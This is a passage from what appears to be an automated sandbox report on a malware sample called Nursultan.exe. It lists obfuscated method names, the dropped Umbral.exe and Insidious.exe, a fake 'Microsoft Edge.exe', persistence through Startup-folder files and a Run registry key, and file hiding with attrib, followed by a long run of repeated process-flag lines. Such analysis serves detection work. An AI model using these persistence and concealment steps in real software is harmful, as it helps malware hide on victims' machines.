'o5vInNRUxOlh9g2B7kJ9XEOAc6bEKfTACtUa2a4zIubra8YqmL2FTBEG2bXhLDNb3MJpWPb4MEcibxJcFHd8PIaqvKTjlWmhT6', 'P2j3FDkc3bPA5rQLlfiNLD32rhzUa9i9spsRXUVBtpgAvycpCBeO7tT3eTfdhG8UBKP0awPS2IPuqUfU4Ki5lgYYsUVme6YSZV'
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, oaBdkauKNCaML.csHigh entropy of concatenated method names: 'FQrc2LLQ6ouhv', 'OJ3ab2FppO7ZZ', 'ZBkd3NZTQuWaf', 'MGwGCKnG7fcbF', 'J4qNdZ9tR2yXl', '_8GDNxOJKjxREA', 'Hn6nzCaz0SlUz', 'hnV4KJv40mvfH', 'Vgb6hOQtzoCL3', 'I4teCO3peVHk2'
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, 0PFivgO7qv3FO.csHigh entropy of concatenated method names: 'pVhIOzDbICvXs', 'vO8Eh53MUGvwzW7iJct7uMacnED0wVGZTEntzQyw1EUHA5mcISVNdnlNbikhTFMULR', 'OUZJ1Cc4yqGHDRk108iufxtlmA0TYXvQ5oDrIGc3lZ5XqtHo8CXtpgYl9Rzka0uqdn', '_4nRTEYsG7T8ApAFG5Zf3zOfAPopOSjN8pkxH75laR8ZkiScud9Gm6WpfK1oxHlzqf6', '_6kKtDckZQIo3s8mllpDIokETcaLVJpdex4gHvnjvyTOgegy0JRCtVnI1GAoE8llHo3'
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, 4XGrZpv9Z38Gc.csHigh entropy of concatenated method names: 'MOPwIW0R07fM1', 'jNdANd8szwAta', 'RSPuqn2kFsUwp', 'bnCbfUC7Ig1zl', 'gRGXSeO4QPWkX', 'BntIUxBkGv7OS', 'fTSeHnVvfi3zN', '_5riJUWwBnV2mZ', 'zIfIEkk7yloMj', 'DsiXSixyLwTDL'
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, JEjSKPz8UTQEy.csHigh entropy of concatenated method names: 'tDI3Dph7HsgRE', '_61dO3StYaJ5lalwW4FBBppX4Lf8V0hL9TiJC7wv2O4jR1V6wqF18Wnro77UImHXeCLBd7kOVBq4LFLfU6rULY8lryYd4iZIGnQ', 'ofsGZPiMRJ17GLZCmGyFhg6qzgZVbzmC8rF3aZ9e4xNG3s7fKxxMmT3dkVfUh3ocY1Am474GJWwWlbCUTdGe8Z0rWIpJZkHZgc', 'TMb4axt9d53yU7oSQOsL8F30wqLq5cGh9lkYCLhatOgw6mBNfMq7x9ifhOd9yXWx34kEchsmJaaffb9xXGdSKvova3mDx8nnkR', 'cw4fAbsQhBwsAOUmfPzTm7Im7hEoYLpj7h6DdiR1chDIs17LcFK6ETaiXxNaE3E45V7j5LVJFwInymeJRc6InyZdtLIOTNq8cJ'
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, 8IQtID4yHRI2I.csHigh entropy of concatenated method names: 's5x2lUco1uh2F', 'JllsSjszFusOrh1r80WdehKzK447AX86KWm0WObcyR13ken6hkKJypliEIsKBKG9LLV9bPCjdx35almahfucfEaxI', '_0EyCxbfpY3wRxUmI3XJ6oyQQggDJ2giYI16MsPH2DAThC2Q4YglEEpxEyE4I5LTeElIBlkA29YY3lrFkensJ2xpRn', 'MOALjvURBajNzN1B8bhcrH6UgeebzgekkQUY7GEg9khEUGPZkHnnjjO84ytNUKyvytg2hRfn7ZeRyRFPsXQycN20w', 'zdb06ZbWaYhRC0FuRdeMXOfISatWl4gFUPuGFVNQT2czmXqcemNQpNg3iq2usbmQp3PfaVsi3fFfQyEzPydtTBKmQ', 'IIDYztLRxtISWQgWODkD1QWQHitlFYGx0byEdFwHoorGpjec9YsVdg7A9budCX0L9r6nXiQGB2ux5szvhM5WGcusI', 'wGkyX4N3b10y7zDTIYyFvKRiw19Hs1OnRKQsxB5mFYJXVPTTiTatUbehanm891fwgI422SaKqNW2Zcgn764HSMZD9', 'aTaDEm66wgUZ2PZLWu0YGha9a6Soc9QpUXUcPOXoCLY6Isa0KswTbymIxn0T3Bu2cofhVxVK3qU5Qso6L79dx6i49', '_5xPjqjnItAAhfCV8KStRnmYzgw7DP3gx0PTW8iKTDsHMWuZBVsh8wbsr8cg6DaiNC1qX9RBzRfW3K9DeVoeiLQf0m', 'Y8aXQY2wGU1JQgdPg54b3pIolW8tzLjCgzdVauHkZ8xeBTb5aVnDgNrsSSpGnC0xJduk93yKgdoNpQnFzRF61qOyp'

                            Persistence and Installation Behavior

                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe; File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scr
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe; Process created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\AppData\Local\Temp\Umbral.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe; File created: C:\Users\user\AppData\Local\Temp\Umbral.exe
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe; File created: C:\Users\user\AppData\Roaming\Microsoft Edge
                            Source: C:\Users\user\Desktop\Nursultan.exe; File created: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe; File created: C:\Users\user\AppData\Local\Temp\Insidious.exe
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe; File created: C:\Users\user\AppData\Local\Temp\Nursultan2.exe
                            Source: C:\Users\user\Desktop\Nursultan.exe; File created: C:\Users\user\AppData\Local\Temp\Nursultan.exe

                            Boot Survival

                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe; File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scr
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Edge.lnk
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe; File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uOWQK.scr
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe; Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Edge

                            Hooking and other Techniques for Hiding and Protection

                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                            Source: C:\Users\user\Desktop\Nursultan.exe; Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe; Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe; Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
